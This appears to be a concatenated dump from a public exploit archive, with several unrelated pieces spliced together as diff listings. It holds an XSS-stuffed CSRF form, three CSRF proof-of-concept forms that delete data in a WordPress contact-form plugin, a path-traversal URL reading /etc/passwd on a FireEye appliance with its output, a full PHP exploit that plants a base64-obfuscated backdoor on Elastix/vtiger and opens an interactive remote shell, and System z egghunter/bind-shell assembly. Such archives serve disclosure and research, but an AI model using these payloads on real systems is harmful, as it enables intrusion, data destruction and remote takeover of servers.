<input type="hidden" name="styles&#91;143&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;144&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;145&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;146&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;147&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;148&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;149&#93;" value="normal" />
<input type="hidden" name="styles&#91;150&#93;" value="normal" />
<input type="hidden" name="styles&#91;151&#93;" value="none" />
<input type="hidden" name="styles&#91;152&#93;" value="inherit" />
<input type="hidden" name="styles&#91;153&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;154&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;155&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;156&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;157&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;158&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;159&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;160&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;161&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;162&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;163&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;164&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;165&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;166&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;167&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;513&#93;" value="cfg&#95;font&#95;effect&#95;none" />
<input type="hidden" name="styles&#91;176&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;177&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;178&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;179&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;180&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;181&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;182&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;183&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;184&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;185&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;186&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;187&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;188&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;189&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;171&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;514&#93;" value="cfg&#95;font&#95;effect&#95;none" />
<input type="hidden" name="styles&#91;172&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;173&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;174&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;175&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;169&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;521&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;522&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;170&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;523&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;535&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;536&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;537&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;538&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;539&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;540&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;541&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;542&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;543&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;544&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;545&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;546&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;547&#93;" value="solid" />
<input type="hidden" name="styles&#91;548&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;549&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;550&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;551&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;524&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;525&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;526&#93;" value="normal" />
<input type="hidden" name="styles&#91;527&#93;" value="normal" />
<input type="hidden" name="styles&#91;528&#93;" value="none" />
<input type="hidden" name="styles&#91;529&#93;" value="inherit" />
<input type="hidden" name="styles&#91;530&#93;" value="cfg&#95;font&#95;effect&#95;none" />
<input type="hidden" name="styles&#91;531&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;532&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;533&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;534&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;91&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;50&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;212&#93;" value="left" />
<input type="hidden" name="styles&#91;92&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;93&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;209&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;100&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;101&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;127&#93;" value="solid" />
<input type="hidden" name="styles&#91;102&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;103&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;104&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;105&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;94&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;95&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;96&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;97&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;98&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;99&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;106&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;107&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;108&#93;" value="normal" />
<input type="hidden" name="styles&#91;109&#93;" value="normal" />
<input type="hidden" name="styles&#91;110&#93;" value="none" />
<input type="hidden" name="styles&#91;112&#93;" value="inherit" />
<input type="hidden" name="styles&#91;515&#93;" value="cfg&#95;font&#95;effect&#95;none" />
<input type="hidden" name="styles&#91;113&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;114&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;115&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;116&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;51&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;52&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;124&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;516&#93;" value="cfg&#95;font&#95;effect&#95;none" />
<input type="hidden" name="styles&#91;125&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;126&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;117&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;118&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;119&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;120&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;121&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;122&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;552&#93;" value="1" />
<input type="hidden" name="styles&#91;553&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;554&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;555&#93;" value="normal" />
<input type="hidden" name="styles&#91;556&#93;" value="normal" />
<input type="hidden" name="styles&#91;596&#93;" value="none" />
<input type="hidden" name="styles&#91;590&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;591&#93;" value="solid" />
<input type="hidden" name="styles&#91;592&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;558&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;559&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;560&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;561&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;563&#93;" value="1" />
<input type="hidden" name="styles&#91;562&#93;" value="1" />
<input type="hidden" name="styles&#91;597&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;598&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;564&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;565&#93;" value="normal" />
<input type="hidden" name="styles&#91;566&#93;" value="normal" />
<input type="hidden" name="styles&#91;594&#93;" value="none" />
<input type="hidden" name="styles&#91;567&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;568&#93;" value="solid" />
<input type="hidden" name="styles&#91;569&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;570&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;571&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;572&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;573&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;574&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;595&#93;" value="none" />
<input type="hidden" name="styles&#91;575&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;576&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;577&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;578&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;579&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;580&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;581&#93;" value="normal" />
<input type="hidden" name="styles&#91;582&#93;" value="normal" />
<input type="hidden" name="styles&#91;593&#93;" value="none" />
<input type="hidden" name="styles&#91;583&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;584&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;585&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;586&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;599&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;628&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="task" value="save" />
<input type="hidden" name="id" value="2" /> <!-- template id to edit -->
<input type="submit" value="Click me for update template" />
</form>
</body>
</html>
<!--
2015-09-02: vulnerability found
2015-09-04: Reported to vendor
2015-09-04: Full disclosure
-->
<html>
<!--
# Exploit Title: WordPress Contact Form Generator v2.0.1 and below (delete) Cross-site Request Forgery (CSRF) issues
# Date: 2015-09-04
# Google Dork: Index of /wp-content/plugins/contact-form-generator/
# Exploit Author: Joaquin Ramirez Martinez [ i0akiN SEC-LABORATORY ]
# Vendor Homepage: http://creative-solutions.net/
# plugin uri: http://creative-solutions.net/wordpress/contact-form-generator/
# Software Link: https://downloads.wordpress.org/plugin/contact-form-generator.zip
# Version: 2.0.1
# Tested on: windows 10 + firefox.
==============
Description
==============
Contact Form Generator is a powerful contact form builder for WordPress! See <a href="http://creative-solutions.net/wordpress/contact-form-generator/demo">Live Demos</a>. It is packed with a <a href="http://creative-solutions.net/wordpress/contact-form-generator/template-creator-demo">Template Creator Wizard</a> to create fantastic forms in a matter of seconds without coding.
===================
TECHNICAL DETAILS
===================
A CSRF issue was found in the latest version of the plugin for wordpress 'Contact Form Generator'.
The issue can be exploited by sending a special link to a wordpress administrator having installed the vulnerable plugin,
making the victim administrator user deletes a form (PoC # 1), delete a form element (PoC # 2), or delete an existing template (PoC # 3).
-->
<!--
===============================
delete a form [CSRF PoC #1]
===============================
-->
<body>
<form action="http://localhost/wordpress2/wp-admin/admin.php?page=cfg_forms" method="POST">
<input type="hidden" name="filter&#95;state" value="2" />
<input type="hidden" name="filter&#95;search" value="" />
<!-- form id value.. -->
<input type="hidden" name="ids&#91;&#93;" value="2" />
<!-- end -->
<input type="hidden" name="task" value="delete" />
<input type="submit" value="Delete form(s)" />
</form>
</body>
<!--
===============================
delete a field [CSRF PoC #2]
===============================
-->
<body>
<form action="http://localhost/wordpress2/wp-admin/admin.php?page=cfg_fields" method="POST">
<input type="hidden" name="filter&#95;form" value="3" />
<input type="hidden" name="filter&#95;state" value="2" />
<input type="hidden" name="filter&#95;type" value="0" />
<input type="hidden" name="filter&#95;search" value="" />
<!-- fields ids to delete -->
<input type="hidden" name="ids&#91;&#93;" value="9" />
<input type="hidden" name="ids&#91;&#93;" value="10" />
<!-- end list -->
<input type="hidden" name="task" value="delete" />
<input type="hidden" name="ids&#91;&#93;" value="" />
<input type="submit" value="delete field(s)" />
</form>
</body>
<!--
==================================
delete a template [CSRF PoC #3]
==================================
-->
<body>
<form action="http://localhost/wordpress2/wp-admin/admin.php?page=cfg_templates" method="POST">
<input type="hidden" name="filter&#95;state" value="2" />
<input type="hidden" name="filter&#95;search" value="" />
<!-- an existing template id(s) to delete -->
<input type="hidden" name="ids&#91;&#93;" value="1" />
<!--end-->
<input type="hidden" name="task" value="delete" />
<input type="hidden" name="ids&#91;&#93;" value="" />
<input type="submit" value="Delete template(s)" />
</form>
</body>
<!---
===========
TIME-LINE
===========
2015-09-02: vulnerability found
2015-09-04: Reported to vendor
2015-09-04: Full disclosure
->

52
platforms/php/webapps/38090.txt Executable file
View file

@ -0,0 +1,52 @@
Just one of many handfuls of FireEye / Mandiant 0day. Been sitting on this for more than 18 months with no fix from those security "experts" at FireEye. Pretty sure Mandiant staff coded this and other bugs into the products. Even more sad, FireEye has no external security researcher reporting process.
FireEye appliance, unauthorized remote root file system access. Oh cool, web server runs as root! Now that's excellent security from a _security_ vendor :) Why would you trust these people to have this device on your network?!?!?
https://fireeyeapp/script/NEI_ModuleDispatch.php?module=NEI_AdvancedConfig&function=HapiGetFileContents&name=../../../../../../../../../../../etc/passwd&extension=&category=operating%20system%20logs&mode=download&time=...&mytoken=...
...
root:aaaaa:16209:0:99999:7:::
bin:*:15628:0:99999:7:::
daemon:*:15628:0:99999:7:::
adm:*:15628:0:99999:7:::
lp:*:15628:0:99999:7:::
sync:*:15628:0:99999:7:::
shutdown:*:15628:0:99999:7:::
halt:*:15628:0:99999:7:::
mail:*:15628:0:99999:7:::
uucp:*:15628:0:99999:7:::
operator:*:15628:0:99999:7:::
games:*:15628:0:99999:7:::
gopher:*:15628:0:99999:7:::
ftp:*:15628:0:99999:7:::
nobody:*:15628:0:99999:7:::
vcsa:!!:16209::::::
rpc:!!:16209:0:99999:7:::
saslauth:!!:16209::::::
postfix:!!:16209::::::
rpcuser:!!:16209::::::
nfsnobody:!!:16209::::::
apache:!!:16209::::::
ntp:!!:16209::::::
lighttpd:!!:16209::::::
sshd:!!:16209::::::
mailnull:!!:16209::::::
smmsp:!!:16209::::::
openvpn:!!:16209::::::
tcpdump:!!:16209::::::
applianceuser:<redacted>:16209:0:99999:7:::
rproxy:aaaaa:16209:0:99999:7:::
sfserver:aaaaa:16209:0:99999:7:::
provisioning:aaaaa:16209:0:99999:7:::
upgrayedd:aaaaa:16209:0:99999:7:::
sftasker:aaaaa:16209:0:99999:7:::
felistener:aaaaa:16209:0:99999:7:::
lighthouse:aaaaa:16209:0:99999:7:::
crlfactory:aaaaa:16209:0:99999:7:::
panlistener:aaaaa:16209:0:99999:7:::
fireeye:<redacted>:16209:0:99999:7:::
--
Kristian Erik Hermansen (@h3rm4ns3c)
https://www.linkedin.com/in/kristianhermansen

95
platforms/php/webapps/38091.php Executable file
View file

@ -0,0 +1,95 @@
<?
echo "\n+-------------------------------------------+\n";
echo "| Elastix <= 2.4 |\n";
echo "| PHP Code Injection Exploit |\n";
echo "| By i-Hmx |\n";
echo "| sec4ever.com |\n";
echo "| n0p1337@gmail.com |\n";
echo "+-------------------------------------------+\n";
echo "\n| Enter Target [https://ip] # ";
$target=trim(fgets(STDIN));
$inj='<?eval(base64_decode("JGY9Zm9wZW4oJ2ZhcnNhd3kucGhwJywndysnKTskZGF0YT0nPD8gaWYoISRfUE9TVFtwd2RdKXtleGl0KCk7fSBlY2hvICJGYXJpcyBvbiB0aGUgbWljIDpEPGJyPi0tLS0tLS0tLS0tLS0tLS0tIjtAZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFtmYV0pKTtlY2hvICItLS0tLS0tLS0tLS0tLS0tLSI7ID8+Jztmd3JpdGUoJGYsJGRhdGEpO2VjaG8gImRvbmUiOwo="));
?>';
$faf=fopen("fa.txt","w+");
fwrite($faf,$inj);
fclose($faf);
$myf='fa.txt';
$url =
$target."/vtigercrm/phprint.php?action=fa&module=ff&lang_crm=../../modules/Import/ImportStep2.php%00";
// URL
$reffer = "http://1337s.cc/index.php";
$agent = "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.4)
Gecko/20030624 Netscape/7.1 (ax)";
$cookie_file_path = "/";
echo "| Injecting 1st payload\n";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_USERAGENT, $agent);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS,array("userfile"=>"@".realpath($myf)));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_REFERER, $reffer);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookie_file_path);
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookie_file_path);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
$result = curl_exec($ch);
curl_close($ch);
//echo $result;
echo "| Injecting 2nd payload\n";
function faget($url,$post){
$curl=curl_init();
curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
curl_setopt($curl,CURLOPT_URL,$url);
curl_setopt($curl, CURLOPT_POSTFIELDS,$post);
curl_setopt($curl, CURLOPT_COOKIEFILE, '/');
curl_setopt($curl, CURLOPT_COOKIEJAR, '/');
curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($curl,CURLOPT_FOLLOWLOCATION,0);
curl_setopt($curl,CURLOPT_TIMEOUT,20);
curl_setopt($curl, CURLOPT_HEADER, true);
$exec=curl_exec($curl);
curl_close($curl);
return $exec;
}
function kastr($string, $start, $end){
$string = " ".$string;
$ini = strpos($string,$start);
if ($ini == 0) return "";
$ini += strlen($start);
$len = strpos($string,$end,$ini) - $ini;
return substr($string,$ini,$len);
}
$me=faget($target."/vtigercrm/phprint.php?action=fa&module=ff&lang_crm=../../cache/import/IMPORT_%00","");
echo "| Testing total payload\n";
$total=faget($target."/vtigercrm/farsawy.php","pwd=1337");
if(!eregi("Faris on the mic :D",$total))
{
die("[+] Exploitation Failed\n");
}
echo "| Sending CMD test package\n";
$cmd=faget($target."/vtigercrm/farsawy.php","pwd=1337&fa=cGFzc3RocnUoJ2VjaG8gZmFyc2F3eScpOw==");
if(!eregi("farsawy",$cmd))
{
echo " + Cmd couldn't executed but we can evaluate php code\n + use :
$target//vtigercrm/fa.php\n Post : fa=base64code\n";
}
echo "| sec4ever shell online ;)\n\n";
$host=str_replace('https://','',$target);
while(1){
echo "i-Hmx@$host# ";
$c=trim(fgets(STDIN));
if($c=='exit'){die("[+] Terminating\n");}
$payload=base64_encode("passthru('$c');");
$fuck=faget($target."/vtigercrm/farsawy.php","pwd=1337&fa=$payload");
$done=kastr($fuck,"-----------------","-----------------");
echo "$done\n";
}
/*
I dont even remember when i exploited this shit!
maybe on 2013?!
whatever , Hope its not sold as 0day in the near future xDD
*/
?>

920
platforms/system_z/shellcode/38075.txt
View file

@ -1,584 +1,158 @@
TITLE 'bind shell for mainframe/system Z' TITLE 'sb_shellcode.s x
BINDSH CSECT Author: Bigendian Smalls'
BINDSH AMODE 31 ACONTROL AFPR
BINDSH RMODE ANY SBSHELL CSECT
*********************************************************************** SBSHELL AMODE 31
* * SBSHELL RMODE ANY
* @SETUP registers and save areas * SYSSTATE ARCHLVL=2
* * ENTRY MAIN
*********************************************************************** MAIN DS 0F
@SETUP DS 0F # full word boundary ** Begin setup and stack management **
STM 14,12,12(13) # save our registers STM 6,4,12(13) # store all the registers in old SP area
LARL 15,@SETUP # base address into R15 LARL 15,*-4 # put base addr into R15
LR 8,15 # copy R15 to R8 LR 12,15 # put given base addr into R12
USING @SETUP,8 # R8 for addressability throughout XR 1,1 # zeroout R1 for counting
LARL 11,SAVEAREA # sa address XR 2,2 # zeroout R1 for counting
ST 13,4(,11) # save callers save area XR 3,3 # zeroout R3
LR 13,11 # R13 to our save area AFI 1,X'01010102' # loading a 1 in R1
DS 0H # halfword boundaries AFI 2,X'01010103' # loading a 1 in R1
XR 1,2 # loading a 1 in R1
*********************************************************************** LR 4,1 # will put a 4 in R4
* * SLA 4,1(1) # make R1 == 4
* @LOADFS - load all the functions we need * XR 10,10 # zeroout R10 for our egg
* for SC loop this * XR 2,2 # zero 2
* * LGFI 10,X'deadbeef' # load egghunter value into R10
*********************************************************************** LR 11,12 # load base int R11
@LOADFS L 2,FFUNC # first function we use LOOPER AR 11,1 # add 1 to R11
LHI 3,8 # used for our index L 3,1(2,11) # retrieve value at R11 +1 indexR2=0
L 4,NUMFUNC # number of functions to load CR 10,3 # compare egg with R11 mem pointer
@LDLOOP LR 0,2 # load string of func name BRC 7,LOOPER # branch anything but equal
XR 1,1 # clear R1 AR 11,4
SVC 8 # perform LOAD L 3,1(2,11) # retrieve value at R11 +1 indexR2=0
XC 0(8,2),0(2) # clear current Func space CR 10,3 # compare egg with R11 mem pointer
ST 0,0(0,2) # store addr in func space BRC 7,LOOPER # 2nd check 2 in a row good to go!
AR 2,3 # increment R2 by 8 AR 11,1 # 1 for the offset from above
AHI 4,-1 # decrement R4 SR 11,4 # 4 to skip last egg
CIB 4,0,2,@LDLOOP # compare R4 with 0,if GT loop ST 13,4(,11) # store old SP for later in wkg area
ST 11,8(,13) # store this in old wking area
*********************************************************************** LR 13,11 # set up R13 pt to new wkg area
* * ** End setup and stack management **
* Create pipes to be used to communicate with child proc * ** Begin main decoding routine **
* that will be created in upcoming forking * LR 3,11 # This is now our egghunter loc
* * AR 3,4 # add 4 to 3
*********************************************************************** AR 3,4 # R3 points to SC for decoding
@CPIPES LARL 14,@CFD LR 5,3 # R5 points to SC for jumping to
BRC 15,LPIPE # get FDs for child proc SR 3,1 # R3-1 to we can XI that addr w/o nulls
@CFD ST 5,CFDR # store child read fd SR 3,1 # R3-1 to we can XI that addr w/o nulls
ST 6,CFDW # store child write fd LR 4,1 # R4 has static 1
@CPIPE2 LARL 14,@PFD XR 1,1 # R1 will be our byte counter
BRC 15,LPIPE # get FDs for parent proc XR 2,2 # R2 will be address pointer
@PFD ST 5,PFDR # store parent read fd LOOP1 AR 1,4 # add 1 to R1 byte counter
ST 6,PFDW # store parent write fd ARK 2,3,1 # generate new address pointer
* put the XOR key (enc buffer char) from below in the quotes below
*********************************************************************** XI 1(2),X'4b' # xor byte with key
* * * put the buffer len (num of bytes) in the next cmd in CHI 1,<here>
* BP1FRK (FORK) fork a child process * CHI 1,2088 # to yield sc len
* * BRC 4,LOOP1 # loop bwd 18 bytes if R1 < size
*********************************************************************** XR 4,4
LFORK L 15,BFRK # load func addr to 15 ** Begin cleanup and stack management **
CALL (15),(CPROCN,RTN_COD,RSN_COD),VL L 13,4(4,11) # reload old SP
BRAS 0,@PREPCHL LM 6,4,12(13) # restore registers
**************************************************** BCR 15,5 # jmp to sc
* chk return code here anything but -1 is ok * ** End main decoding routine **
**************************************************** DC X'DEADBEEF' #egg
LHI 15,1 # load 1 for RC / Debugging DC X'DEADBEEF' #egg + old sp
